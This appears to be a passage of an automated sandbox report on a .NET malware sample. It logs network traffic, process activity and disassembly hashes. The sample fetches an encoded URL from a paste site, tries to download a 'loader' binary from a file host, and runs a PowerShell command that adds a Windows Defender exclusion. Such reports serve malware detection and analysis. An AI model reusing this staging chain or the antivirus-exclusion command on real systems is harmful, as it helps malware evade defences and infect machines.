2023-12-08 13:29:02 UTC	1849	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49709	104.21.70.240	443	7944	C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-08 13:29:07 UTC	74	OUT	GET /raw/015dbe46ef97 HTTP/1.1 Host: paste.fo Connection: Keep-Alive
2023-12-08 13:29:08 UTC	801	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 32 39 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6a 6b 36 6d 37 72 6d 72 33 31 74 61 65 76 6b 32 35 74 67 6d 62 71 35 71 36 71 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 74 6f 6b 65 6e 3d 64 65 6c 65 74 65 64 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 2d 4a 61 6e 2d 31 39 37 30 20 30 30 3a 30 30 3a 30 31 20 47 4d 54 Data Ascii: HTTP/1.1 200 OKDate: Fri, 08 Dec 2023 13:29:08 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 48Connection: closeSet-Cookie: PHPSESSID=jk6m7rmr31taevk25tgmbq5q6q; path=/Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
2023-12-08 13:29:08 UTC	48	IN	Data Raw: 61 48 52 30 63 48 4d 36 4c 79 39 76 63 32 68 70 4c 6d 46 30 4c 33 52 78 53 6b 46 6a 4c 32 4a 73 64 57 56 73 62 33 46 6b 5a 58 49 75 59 6d 6c 75 Data Ascii: aHR0cHM6Ly9vc2hpLmF0L3RxSkFjL2JsdWVsb3FkZXIuYmlu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49710	5.253.86.15	443	7944	C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-08 13:29:08 UTC	77	OUT	GET /tqJAc/blueloqder.bin HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-12-08 13:29:10 UTC	158	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 32 39 3a 30 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 34 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 08 Dec 2023 13:29:09 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
2023-12-08 13:29:10 UTC	1849	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49712	104.21.70.240	443	5440	C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-08 13:29:15 UTC	74	OUT	GET /raw/015dbe46ef97 HTTP/1.1 Host: paste.fo Connection: Keep-Alive
2023-12-08 13:29:16 UTC	807	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 32 39 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 39 38 67 33 63 72 68 71 69 67 38 33 32 67 73 6c 30 68 37 6b 33 37 6f 6d 71 63 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 74 6f 6b 65 6e 3d 64 65 6c 65 74 65 64 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 2d 4a 61 6e 2d 31 39 37 30 20 30 30 3a 30 30 3a 30 31 20 47 4d 54 Data Ascii: HTTP/1.1 200 OKDate: Fri, 08 Dec 2023 13:29:15 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 48Connection: closeSet-Cookie: PHPSESSID=98g3crhqig832gsl0h7k37omqc; path=/Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
2023-12-08 13:29:16 UTC	48	IN	Data Raw: 61 48 52 30 63 48 4d 36 4c 79 39 76 63 32 68 70 4c 6d 46 30 4c 33 52 78 53 6b 46 6a 4c 32 4a 73 64 57 56 73 62 33 46 6b 5a 58 49 75 59 6d 6c 75 Data Ascii: aHR0cHM6Ly9vc2hpLmF0L3RxSkFjL2JsdWVsb3FkZXIuYmlu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49714	5.253.86.15	443	5440	C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-08 13:29:16 UTC	77	OUT	GET /tqJAc/blueloqder.bin HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-12-08 13:29:42 UTC	158	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 32 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 34 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 08 Dec 2023 13:29:42 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
2023-12-08 13:29:42 UTC	1849	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 9K25QyJ4hA.exePID: 7384, Parent PID: 4084

General

Target ID:	0
Start time:	14:28:56
Start date:	08/12/2023
Path:	C:\Users\user\Desktop\9K25QyJ4hA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\9K25QyJ4hA.exe
Imagebase:	0x190000
File size:	15'872 bytes
MD5 hash:	7E658759B69B246757803BAF9F776A60
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7416, Parent PID: 7384

General

Target ID:	2
Start time:	14:28:56
Start date:	08/12/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Imagebase:	0xe00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7448, Parent PID: 7416

General

Target ID:	3
Start time:	14:28:56
Start date:	08/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7820, Parent PID: 7384

General

Target ID:	7
Start time:	14:29:02
Start date:	08/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7384 -s 1604
Imagebase:	0xae0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: 9K25QyJ4hA.exePID: 7944, Parent PID: 4084

General

Target ID:	9
Start time:	14:29:05
Start date:	08/12/2023
Path:	C:\Users\user\Desktop\9K25QyJ4hA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9K25QyJ4hA.exe"
Imagebase:	0x820000
File size:	15'872 bytes
MD5 hash:	7E658759B69B246757803BAF9F776A60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7984, Parent PID: 7944

General

Target ID:	10
Start time:	14:29:05
Start date:	08/12/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Imagebase:	0xe00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7996, Parent PID: 7984

General

Target ID:	11
Start time:	14:29:05
Start date:	08/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7208, Parent PID: 7944

General

Target ID:	14
Start time:	14:29:09
Start date:	08/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7944 -s 2428
Imagebase:	0xae0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: 9K25QyJ4hA.exePID: 5440, Parent PID: 4084

General

Target ID:	15
Start time:	14:29:13
Start date:	08/12/2023
Path:	C:\Users\user\Desktop\9K25QyJ4hA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9K25QyJ4hA.exe"
Imagebase:	0xb80000
File size:	15'872 bytes
MD5 hash:	7E658759B69B246757803BAF9F776A60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 332, Parent PID: 5440

General

Target ID:	16
Start time:	14:29:13
Start date:	08/12/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Imagebase:	0xe00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7376, Parent PID: 332

General

Target ID:	17
Start time:	14:29:13
Start date:	08/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4132, Parent PID: 5440

General

Target ID:	23
Start time:	14:29:41
Start date:	08/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 2396
Imagebase:	0xae0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 9K25QyJ4hA.exePID: 7384, Parent PID: 4084COMMON

Executed Functions

Function 00951DF8 Relevance: 3.8, Strings: 3, Instructions: 89COMMON

Download Yara Rule

Strings

<v, xrefs: 00951F48
0v, xrefs: 00951F11
0v, xrefs: 00951ED7

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID: 0v$0v$<v
API String ID: 0-2491955087
Opcode ID: 2bffe3178be1e8c5ce9c901deb8bbf7c26f0f4dcb4013460212743a22f164c16
Instruction ID: e19d0593a19685e802c780d18a18ef63e3b0ae37623918e140498a2d94260600
Opcode Fuzzy Hash: 2bffe3178be1e8c5ce9c901deb8bbf7c26f0f4dcb4013460212743a22f164c16
Instruction Fuzzy Hash: EF31BC31B042058FDB05DFA9C880A9EF7F6AF88361B14856ADC4ADB351DB34EC498B91

Uniqueness

Uniqueness Score: -1.00%

Function 00951125 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

$ow, xrefs: 00951151

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID: $ow
API String ID: 0-3959530713
Opcode ID: 596fb6660e4ca2767e0039da41eaea0fc185bc1e07f43bb4675de1497d1ab196
Instruction ID: 00cc6f90fde58b485bfd0cd6a7de2b7c7d5a327535be8f0e6b7ff561b3586f28
Opcode Fuzzy Hash: 596fb6660e4ca2767e0039da41eaea0fc185bc1e07f43bb4675de1497d1ab196
Instruction Fuzzy Hash: 9321F571E002199FCF01DFA8D4409DDBBB6FF89710F0182A5D494BB255DB34AA46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00951128 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

$ow, xrefs: 00951151

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID: $ow
API String ID: 0-3959530713
Opcode ID: c02daac833417d9a990e15e27112b643b21415d89fe4b7c2392b50da2f39e953
Instruction ID: 81a3a5589df668295a5c4b7a8945d5f4fa5b07946b22fc4f8e65c86affcba475
Opcode Fuzzy Hash: c02daac833417d9a990e15e27112b643b21415d89fe4b7c2392b50da2f39e953
Instruction Fuzzy Hash: D621F371E0021A9FCF01DFA8D4409DDBBB6FF89710F0182A6D494BB265DB30AA46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 009515E0 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f454310bdf29e8815f8c2cd36f9d1f7a2bdd914556200d927798901542ce3e97
Instruction ID: 1a68514ee9bbe6e0545600094b69c92485c4ddb9fbf2209e89aae9fb2a6c0611
Opcode Fuzzy Hash: f454310bdf29e8815f8c2cd36f9d1f7a2bdd914556200d927798901542ce3e97
Instruction Fuzzy Hash: 8BC1CF74D01209CFCB14CFA9C480ADDBBF6BF49305F24866AD815AB361DB74A94ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 00950880 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 329e7ea1493cab0e2fc94e62eae27b46a1e9864eb88ec2a9747515b99cf1484f
Instruction ID: f2c5e701e05eefd0d1c9a4678d319e219c7d857ca46202253f7ec7e66bf09c4f
Opcode Fuzzy Hash: 329e7ea1493cab0e2fc94e62eae27b46a1e9864eb88ec2a9747515b99cf1484f
Instruction Fuzzy Hash: BAB1E274E00219CFDB14DFA9D884AADBBF2BF89300F208569D819BB365DB35A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00951230 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d447d2438ec2507e8701f7661c6dbdc15e95e5e0f76d8c59d320467442b7124e
Instruction ID: c64c83b485d51707c341495cde299d5cc5ab71c28d3b5fbbf608a8686bd77903
Opcode Fuzzy Hash: d447d2438ec2507e8701f7661c6dbdc15e95e5e0f76d8c59d320467442b7124e
Instruction Fuzzy Hash: 64916E74A02209DFCB08CFA9D58499DFBF6BF89310B258265E809AB365D770EE45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00952DB4 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8488e8a33705195a80de02eeb6d4d97925beb78d09ac100c41508f8b3e4db9c
Instruction ID: fe6a0fd55778ad708497d7174c5040f35f64e3d6cf1b4c3b3a39d98fcb1074cb
Opcode Fuzzy Hash: b8488e8a33705195a80de02eeb6d4d97925beb78d09ac100c41508f8b3e4db9c
Instruction Fuzzy Hash: 5111A034D00249DFDB28DF65C845BDEBBB1BB8A311F249169D841732A1CB30584DCB68

Uniqueness

Uniqueness Score: -1.00%

Function 00952105 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a32e69b579240bf3beee13988a3889a61f2d497a29e10efe6aa4133298cfa46
Instruction ID: 2fc1e548816228025f68d2876f382233688b203fe6375ba633aa3cff9bf20fe1
Opcode Fuzzy Hash: 7a32e69b579240bf3beee13988a3889a61f2d497a29e10efe6aa4133298cfa46
Instruction Fuzzy Hash: AA313570D00249EFDB14DFAAD880ADEBFF5AF48300F248429E919AB350DB759945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00952110 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3dd555e43dead4e24344690c553a0ae5d7c334d6e8afa224b8ac9487b90688
Instruction ID: 8a2f19bc7a265df270b602aea58aca9abb9ba54e3dd1b960b318b392e9cef9ac
Opcode Fuzzy Hash: fd3dd555e43dead4e24344690c553a0ae5d7c334d6e8afa224b8ac9487b90688
Instruction Fuzzy Hash: F9311670D00248EFDB14CFAAC980ADEBFF5AF48310F248429E919AB350DB759945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0076D5F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1462419897.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76d000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 788aad35183260e61e16f53caeaefb59f7bb91686a42d4ee8fb7588d82b933e7
Instruction ID: 8cfa1913f99c6bd862b290d0f4411c1d5622e323cb80afccd2709bbb6612efbb
Opcode Fuzzy Hash: 788aad35183260e61e16f53caeaefb59f7bb91686a42d4ee8fb7588d82b933e7
Instruction Fuzzy Hash: 3E2125B1A14240DFDB25DF10D9C0B26BBA5FB98354F24C569EC0A0B256C33ADC56CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0076D6DC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1462419897.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76d000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d585e3146ea3b049a53712cb6da7d63bcffdcb24e61a54e0376a6e684dcebe9
Instruction ID: 38d6c0e628fc34310c96cc7796d7cfb33da45d52fec6aacce008b46aba8f087f
Opcode Fuzzy Hash: 8d585e3146ea3b049a53712cb6da7d63bcffdcb24e61a54e0376a6e684dcebe9
Instruction Fuzzy Hash: DA212871A14344DFDB24DF10D9C0B16BBA6FB98314F24C169EC0A0B246C33ADC56CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 009514BF Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f43e49e0ff126ced7fdc3ed097c50fc007f4c2b3e7729e27e0d952642ad7878
Instruction ID: 9761d4c98335822456997a4dacad0286485c7d59540dc116ba9afdf529e84755
Opcode Fuzzy Hash: 6f43e49e0ff126ced7fdc3ed097c50fc007f4c2b3e7729e27e0d952642ad7878
Instruction Fuzzy Hash: 73215770E0424D9FCF05DFA8C4409DDBBB5FF89310B1082A6D455BB261D734A946CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00950C39 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1463605932.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_9K25QyJ4hA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a69271a332e875aa668a526b08d9f32a5952c59577c2a5daa752ce70e0ea2a
Instruction ID: d3d38afe067c538bbe0d8e109da14bb9c502bc55e5141054854a998bd5b95edf
Opcode Fuzzy Hash: 89a69271a332e875aa668a526b08d9f32a5952c59577c2a5daa752ce70e0ea2a
Instruction Fuzzy Hash: B7213474A01208DFDB08DFAAD554ADEBBF2BB89311F24912AE805B7350DB315D48CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0076D5EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

